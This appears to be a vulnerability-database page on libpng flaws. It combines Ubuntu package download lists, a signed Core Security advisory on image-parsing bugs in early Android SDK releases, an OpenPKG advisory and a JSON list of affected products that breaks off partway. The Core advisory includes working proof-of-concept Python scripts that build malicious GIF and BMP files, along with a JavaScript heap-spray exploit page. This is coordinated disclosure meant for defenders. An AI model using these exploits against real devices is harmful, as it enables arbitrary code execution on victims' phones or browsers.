http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb
Size/MD5: 68992 105702504b783f464dff9ddd48de5ab0
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb
Size/MD5: 113542 876f5c1a3a1f6b4bf828edcbabe0702e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb
Size/MD5: 247132 75d920fe60a5d4f356ccb43d8d5a98ed
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb
Size/MD5: 69932 53783b0d13fd194f8cc9f19e1edc63d7
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb
Size/MD5: 114634 1b40abad309e133326ffdce859734610
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb
Size/MD5: 242882 3dca0a0938a43308465c8987f1357160
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb
Size/MD5: 67606 088844733b580984e1a3b79001a27511
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb
Size/MD5: 112228 6024c0c9d455cfdaa8a38e89d6a53148
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb
Size/MD5: 246684 e45d2830ca5bdf0747ea0d436fafc20e
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb
Size/MD5: 64656 55d6e7740ec8a9eddcbbfdada56a5f63
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb
Size/MD5: 109396 0b522137b1f4b2a34f990efc9dbd81df
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb
Size/MD5: 241064 e679e908623c68c5865fbf2c24c46973
Updated packages for Ubuntu 7.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz
Size/MD5: 14344 16526f313e1ee650074edd742304ec53
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc
Size/MD5: 819 b28af76731dfe368e48dfcd554d7b583
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz
Size/MD5: 829038 77ca14fcee1f1f4daaaa28123bd0b22d
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb
Size/MD5: 936 dcec28b3cf4b8ee22c6a1229fdbd2e84
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb
Size/MD5: 70656 b4fa5b37b54fee32dd7404c64b696192
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb
Size/MD5: 189594 7e36d8e73bd47dbb19afd7cd0099335a
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb
Size/MD5: 179950 c575d8c9699c971ec7682e52e37590b7
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb
Size/MD5: 68246 c81ffc4cd0359a1ce1e73eb99d8608f6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb
Size/MD5: 187234 09dcea1e3394a6d25565b23774d805db
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb
Size/MD5: 171520 ac3fb45b36ec32b1bac4734eef162c49
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb
Size/MD5: 70652 147c89e36570990d5e084fc3a8933ed2
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb
Size/MD5: 189548 00b81b16632e789ab20bab04dbcd586c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb
Size/MD5: 179128 61c51aafc326420b202c0f2ce6d5abfd
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb
Size/MD5: 66396 faff3d313cdc64f273eda1a5d01c2e0a
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb
Size/MD5: 185312 249165d75936ab8cfc2fa1aef68a5ee6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb
Size/MD5: 173800 a40164cd4995c6ed795219157e6d598e
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
Advisory Information
Title: Multiple vulnerabilities in Google's Android SDK Advisory ID: CORE-2008-0124 Advisory URL: http://www.coresecurity.com/?action=item&id=2148 Date published: 2008-03-04 Date of last update: 2008-03-04 Vendors contacted: Google Release mode: Coordinated release
Vulnerability Information
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
Vulnerability Description
Android is project promoted primarily by Google through the Open Handset Alliance aimed at providing a complete set of software for mobile devices: an operating system, middleware and key mobile applications [1]. Although the project is currently in a development phase and has not made an official release yet, several vendors of mobile chips have unveiled prototype phones built using development releases of the platform at the Mobile World Congress [2]. Development using the Android platform gained activity early in 2008 as a result of Google's launch of the Android Development Challenge which includes $10 million USD in awards [3] for which a Software Development Kit (SDK) was made available in November 2007.
The Android Software Development Kit includes a fully functional operating system, a set of core libraries, application development frameworks, a virtual machine for executing application and a phone emulator based on the QEMU emulator [4]. Public reports as of February 27th, 2008 state that the Android SDK has been downloaded 750,000 times since November 2007 [5].
Several vulnerabilities have been found in Android's core libraries for processing graphic content in some of the most used image formats (PNG, GIF an BMP). While some of these vulnerabilities stem from the use of outdated and vulnerable open source image processing libraries other were introduced by native Android code that use them or that implements new functionality.
Exploitation of these vulnerabilities to yield complete control of a phone running the Android platform has been proved possible using the emulator included in the SDK, which emulates phone running the Android platform on an ARM microprocessor.
This advisory contains technical descriptions of these security bugs, including a proof of concept exploit to run arbitrary code, proving the possibility of running code on Android stack (over an ARM architecture) via a binary exploit.
Vulnerable Packages
. Android SDK m3-rc37a and earlier are vulnerable several bugs in components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of this advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component that process BMP images (bug #3).
Non-vulnerable Packages
. Android SDK m5-rc15
Vendor Information, Solutions and Workarounds
Vendor statement:
"The current version of the Android SDK is an early look release to the open source community, provided so that developers can begin working with the platform to inform and shape our development of Android toward production readiness. The Open Handset Alliance welcomes input from the security community throughout this process. There will be many changes and updates to the platform before Android is ready for end users, including a full security review."
Credits
These vulnerabilities were discovered by Alfredo Ortega from Core Security Technologies, leading his Bugweek 2007 team called "Pampa Grande". It was researched in depth by Alfredo Ortega.
Technical Description / Proof of Concept Code
Android is a software stack for mobile devices that includes an operating system, middleware and key applications. Android relies on Linux version 2.6 for core system services such as security, memory management, process management, network stack, and driver model. The kernel also acts as an abstraction layer between the hardware and the rest of the software stack.
The WebKit application framework is included to facilitate development of web client application functionality. The framework in turn uses different third-party open source libraries to implement processing of several image formats.
Android includes a web browser based on the Webkit framework that contains multiple binary vulnerabilities when processing .GIF, .PNG and .BMP image files, allowing malicious client-side attacks on the web browser. A client-side attack could be launched from a malicious web site, hosting specially crafted content, with the possibility of executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the Android SDK that includes an ARM architecture emulator. Binary vulnerabilities are the most common security bugs in computer software. Basic bibliography on these vulnerabilities includes a recently updated handbook about security holes that also describes current state-of-the-start exploitation techniques for different hardware platforms and operating systems [6].
The vulnerabilities discovered are summarized below grouped by the type of image file format that is parsed by the vulnerable component.
#1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is image format dating at least from 1989 [7]. It was popularized because GIF images can be compressed using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the memory footprint and bandwidth required for transmission and storage.
A memory corruption condition happens within the GIF processing library of the WebKit framework when the function 'GIFImageDecoder::onDecode()' allocates a heap buffer based on the Logical Screen Width and Height filed of the GIF header (offsets 6 and 8) and then the resulting buffer is filled in with an amount of data bytes that is calculated based on the real Width and Height of the GIF image. There is a similar (if not the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the open-source version included by Android in 'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp' inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].
Detailed analysis:
When the process 'com.google.android.browser' must handle content with a GIF file it loads a dynamic library called 'libsgl.so' which contains the decoders for multiple image file formats.
Decoding of the GIF image is performed correctly by the library giflib 4.0 (compiled inside 'libsgl.so'). However, the wrapper object 'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following calling sequence (As giflib is an Open Source MIT-licenced library, the source was available for analysis): 'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last function, 'DGifGetScreenDesc()', stores the Logical Screen Width and Height in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) { ... / Put the screen descriptor into the file: / if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR || DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR) return GIF_ERROR; ... } - -----------/
We can see that the fields are stored in the first 2 words of the structure:
/-----------
typedef struct GifFileType { / Screen dimensions. / GifWord SWidth, SHeight, ... } - -----------/
In the disassembly of the GIFImageDecoder::onDecode() function provided below we can see how the DGifOpen() function is called and that the return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234 BL DGifOpen .text:0002F238 SUBS R5, R0, #0 ; GifFile - $R5 - -----------/
Then, the giflib function 'DGifSlurp()' is called and the Image size is correctly allocated using the Image Width and Height and not the Logical Screen Size:
/-----------
Int DGifSlurp(GifFileType * GifFile) { ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height; sp->RasterBits = (unsigned char *)malloc(ImageSize * sizeof(GifPixelType)); ... } - -----------/
Afterwards the Logical Screen Width and Height are stored in the R9 and R11 registers:
/-----------
.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight ! - -----------/
However the actual image may be much larger that these sizes that are incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice(): .text:0002F294 MOV R0, R8 .text:0002F298 MOV R1, #3 .text:0002F29C MOV R2, R9 .text:0002F2A0 MOV R3, R11 .text:0002F2A4 STR R12, [SP,#0x48+var_3C] .text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice; ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int ,int)
Bitmap::setConfig(): .text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap .text:0002F2BC MOV R1, #3 .text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight ! .text:0002F2C4 MOV R3, R11 .text:0002F2C8 STR R10, [SP,#0x48+var_48] .text:0002F2CC BL _Bitmap9setConfig ; Bitmap::setConfig(SkBitmap::Config,uint,uint,uint) - -----------/
This function stores the SWidth and SHeight inside the Bitmap object as shown in the following code snippet:
/-----------
.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7 .text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8 .text:00035C40 MOV R4, R0 ; $R4 = *Bitmap - -----------/
And later:
/-----------
.text:00035C58 BL _Bitmap15ComputeRowBytes ; SkBitmap::ComputeRowBytes(SkBitmap::Config,uint) .text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes .text:00035C68 STRH R7, [R4,#0x18] ; Bitmap+0x18 = SWidth .text:00035C6C STRH R8, [R4,#0x1A] ; Bitmap+0x1A = SHeight .text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes - -----------/
The following python script generates a GIF file that causes the overflow. It requires the Python Imaging Library. Once generated the GIF file, it must be opened in the Android browser to trigger the overflow:
/-----------
Android Heap Overflow
Ortega Alfredo _ Core Security Exploit Writers Team
tested against Android SDK m3-rc37a
import Image import struct
Creates a good gif image
imagename='overflow.gif' str = '\x00\x00\x00\x00'*30000 im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1) im.save(imagename,'GIF')
Shrink the Logical screen dimension
SWidth=1 SHeight=1
img = open(imagename,'rb').read() img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
Save the bad gif image
q=open(imagename,'wb=""') q.write(img) q.close() - -----------/
This security bug affects Android SDK m3-rc37a and earlier versions. Version m5-rc14 of the Android SDK includes a fix and is not vulnerable to this bug.
#2 - PNG image parsing, multiple vulnerabilities:
The Portable Network Graphics (PNG) is a bitmapped image format that employs lossless data compression [9]. PNG was created to improve upon and replace the GIF format as an image file format that does not require a patent license. The version inside libsgl.so distributed with Android SDK m3-rc37a and earlier versions include the string '"libpng version 1.2.8 - December 3, 2004"'. Source code inspection of the file '\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android project reveals that '"libpng version 1.2.7 - September 12, 2004"' has been used in this release.
This old version of libpng makes Android SDK m3-rc37a and earlier versions vulnerable to the following known issues: ' CVE-2006-5793, CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269 '.
Android version m5-rc14 has been updated to include libpng 1.2.24 and is likely not vulnerable.
#3 - BMP image processing, negative offset integer overflow:
The BMP file format, sometimes called bitmap or DIB file format (for device-independent bitmap), is an image file format used to store bitmap digital images, especially on Microsoft Windows and OS/2 operating systems [10].
The integer overflow is caused when a Windows Bitmap file (.BMP) header is parsed in the method 'BMP::readFromStream(Stream *, ImageDecoder::Mode)' inside the 'libsgl.so' library. When the value of the 'offset' field of the BMP file header is negative and the Bitmap Information section (DIB header) specifies an image of 8 bits per pixel (8 bpp) the parser will try to allocate a palette, and will use the negative offset to calculate the size of the palette.
The following code initializes the palette with the color white ('0x00ffffff') but with a carefully chosen negative offset it can be made to overwrite any address of the process with that value. Because the BMP decoder source wasn't released, a disassembly of the binary included by Android is provided below:
/-----------
.text:0002EE38 MOV LR, R7 ; R7 is the negative offset .text:0002EE3C MOV R12, R7,LSL#2 .text:0002EE40 .text:0002EE40 loc_2EE40 .text:0002EE40 LDR R3, [R10,#0x10] .text:0002EE44 ADD LR, LR, #1 .text:0002EE48 MOVL R2, 0xFFFFFFFF .text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the same bug) but ranges 0x10000-0x20000 .text:0002EE50 MOV R0, #0 .text:0002EE54 CMP LR, R9 .text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1) .text:0002EE5C STRB R2, [R1,#2] .text:0002EE60 STRB R0, [R1,#3] .text:0002EE64 STRB R2, [R1,#1] .text:0002EE68 ADD R12, R12, #4 .text:0002EE6C BNE loc_2EE40 - -----------/
Now, if let's take a look at the memory map of the Android browser:
/-----------
ps
ps USER PID PPID VSIZE RSS WCHAN PC NAME root 1 0 248 64 c0084edc 0000ae2c S /init root 2 0 0 0 c0049168 00000000 S kthreadd ... root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb app_0 1574 535 83564 12832 ffffffff afe0c79c S com.google.android.browser root 1600 587 840 324 00000000 afe0bfbc R ps
cat /proc/1574/maps
cat /proc/1574/maps 00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process 0000a000-00c73000 rwxp 0000a000 00:00 0 [heap] 08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted) ...
- -----------/
We can see that the heap is located in the range '0000a000-00c73000' and it is executable. Overwriting this area will allow to redirect execution flow if there is a virtual table stored in the heap. Later on the same method we can see that a call to the "Stream" Object VT is made:
/-----------
.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object .text:0002EB68 MOV R0, R8 .text:0002EB6C MOV LR, PC .text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10 - -----------/
Because the "Stream" Object (R8) is stored on the heap and we can fill the heap with the white color ' 0x00ffffff' we can load the Program Counter with the value at '0xffffff+0x10'. The following python script will generate a BMP to accomplish that:
/-----------
This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10
Must be loaded inside a HTML file with a tag like this: <IMG
src=badbmp.bmp>
Alfredo Ortega - Core Security
import struct
offset = 0xffef0000 width = 0x0bffff height=8
bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00" bmp+=struct.pack("<I",offset) bmp+="\x28\x00\x00\x00" bmp+=struct.pack("<I",width) bmp+=struct.pack("<I",height) bmp+="\x03\x00\x08\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff" bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41" bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" open("badbmp.bmp","wb").write(bmp) - -----------/
Opening the BMP file generated with this script inside a HTML page will cause (sometimes, as it is dependent on an uninitialized variable) the following output of the gdb debugger:
/-----------
(gdb) attach 1574 attach 1574 Attaching to program: /system/bin/app_process, process 1574 ... 0xafe0d204 in __futex_wait () from /system/lib/libc.so (gdb) c Continuing.
Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () (gdb) - -----------/
Here the browser process has jumped to the '0x00000000' address because that is the value at 0x00ffffff+0x10. We can change this value using common JavaScript heap-filling techniques.
The complete exploit page follows:
/-----------
// Fill 0x200000 - 0xa00000 with Breakpoints var nop = unescape("%u0001%uef9f"); while (nop.length <= 0x100000/2) nop += nop; var i = 0; for (i = 0;i<5;i++) document.write(nop) // Fill 0xa00000 - 0x1100000 with address 0x00400040 var nop = unescape("%u4000%u4000"); while (nop.length <= 0x100000/2) nop += nop; var i = 0; for (i = 0;i<2;i++) document.write(nop)
- -----------/
Because the exploit needs to fill over 16 MB of heap memory to reach the address '0xffffff' it is very slow and the default memory configuration of Android will often abort the process before reaching the desired point. To overcome this limitation for demonstration purposes one can launch the emulator with this parameters:
'emulator -qemu -m 192'
That will launch the Android emulator with 192 megabytes of memory, plenty for the exploit to work.
Report Timeline
. 2008-01-30: Vendor is notified that possibly exploitable vulnerabilities where discovered and that an advisory draft is available. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to generate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for the open source community, but agree they can fix the problem on the estimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a vulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new findings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found will be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core receives no notification. 2008-02-13: Core sends the vendor more malformed images, including GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory, including a BMP PoC that runs arbitrary ARM code and informs the vendor that we noticed that the recent m5-rc14 release fixed the GIF and PNG bugs. Publication of CORE-2008-0124 has been re-=scheduled for February 27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been released and provides an official statement to the "Vendor Section" of the advisory. A final review of the advisory is requested before its release. The vendor indicates that the Android SDK is still in development and stabilization won't happen until it gets closer to Alpha. Changes to fix the BMP issue are coming soon, priorities are given to issues listed in the public issue tracking system at http://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has been moved to March 3rd 2008, asks if an estimated date for the BMP fix is available and if Core should file the reported and any future bugs in the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to the vendor as requested. Core requests for any additional comments or statements to be provided by noon March 3rd, 2008 (UTC-5) . 2008-03-01: Vendor requests publication to be delayed one day in order to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP vulnerability. Vendor indicates that Android applications run with the credentials of an unprivileged user which decreases the severity of the issues found . 2008-03-04: Further research by Alfredo Ortega reveals that although the vendor statement is correct current versions of Android SDK ship with a passwordless root account. Unprivileged users with shell access can simply use the 'su' program to gain privileges . 2008-03-04: Advisory CORE-2008-0124 is published.
References
[1] Android Overview - Open Handset Alliance - http://www.openhandsetalliance.com/android_overview.html [2] "Android Comes to Life in Barcelona" - The Washington Post , February 11th, 2008 - http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html [3] Android Developer Challenge - http://code.google.com/android/adc.html [4] "Test Center Preview: Inside Google's Mobile future" - Inforworld, Feb. 27th 2008 - http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html [5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th, 2008 http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html [6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. Wiley; 2nd edition (August 20, 2007) - http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html [7] Graphics Interchange Format version 89a - http://www.w3.org/Graphics/GIF/spec-gif89a.txt [8] Android downloads page http://code.google.com/p/android/downloads/list [9] Portable Network Graphics (PNG) specification - http://www.w3.org/TR/PNG/ [10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.
About Core Security Technologies
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
GPG/PGP Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I teV3ahcSAUFEtsaRCeXVuN8= =u35s -----END PGP SIGNATURE-----
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Publisher Name: OpenPKG GmbH Publisher Home: http://openpkg.com/
Advisory Id (public): OpenPKG-SA-2007.013 Advisory Type: OpenPKG Security Advisory (SA) Advisory Directory: http://openpkg.com/go/OpenPKG-SA Advisory Document: http://openpkg.com/go/OpenPKG-SA-2007.013 Advisory Published: 2007-05-17 22:31 UTC
Issue Id (internal): OpenPKG-SI-20070517.02 Issue First Created: 2007-05-17 Issue Last Modified: 2007-05-17 Issue Revision: 03
Subject Name: png Subject Summary: Portable Network Graphics (PNG) Image Format Library Subject Home: http://www.libpng.org/pub/png/libpng.html Subject Versions: * <= 1.2.16
Vulnerability Id: CVE-2007-2445 Vulnerability Scope: global (not OpenPKG specific)
Attack Feasibility: run-time Attack Vector: remote network Attack Impact: denial of service
Description: As confirmed by the vendor, a Denial of Service (DoS) vulnerability exists in the PNG [0] image format library libpng [1]. The bug is a NULL-pointer-dereference vulnerability involving palette images with a malformed "tRNS" PNG chunk, i.e., one with a bad CRC value. This bug can, at a minimum, cause crashes in applications simply by displaying a malformed image.
References: [0] http://www.libpng.org/pub/png/ [1] http://www.libpng.org/pub/png/libpng.html [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445
Primary Package Name: png Primary Package Home: http://openpkg.org/go/package/png
Corrected Distribution: Corrected Branch: Corrected Package: OpenPKG Enterprise E1.0-SOLID ghostscript-8.54-E1.0.1 OpenPKG Enterprise E1.0-SOLID png-1.2.12-E1.0.2 OpenPKG Community CURRENT ghostscript-8.57-20070516 OpenPKG Community CURRENT png-1.2.18-20070516
For security reasons, this document was digitally signed with the OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34) which you can download from http://openpkg.com/openpkg.com.pgp or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. Follow the instructions at http://openpkg.com/security/signatures/ for more details on how to verify the integrity of this document
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "libpng",
"scope": "lte",
"trust": 1.0,
"vendor": "png reference library",
"version": "1.2.16"
},
{
"_id": null,
"model": "libpng",
"scope": "lte",
"trust": 1.0,
"vendor": "png reference library",
"version": "1.0.15"
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian gnu linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "gentoo linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mandriva",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ubuntu",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "libpng",
"version": null
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.8,
"vendor": "png group",
"version": "0.90 to 1.0.24 up to version"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.8,
"vendor": "png group",
"version": "1.2.0 to 1.2.16 up to version"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.2"
},
{
"_id": null,
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.2"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "2.0"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "2.1"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3.0"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3.0 (x86-64)"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "4.0"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "4.0 (x86-64)"
},
{
"_id": null,
"model": "java desktop system",
"scope": "eq",
"trust": 0.8,
"vendor": "sun microsystems",
"version": "release 2 (solaris 9 x86 for )"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "sun microsystems",
"version": "10 (sparc)"
},
{
"_id": null,
"model": "solaris",
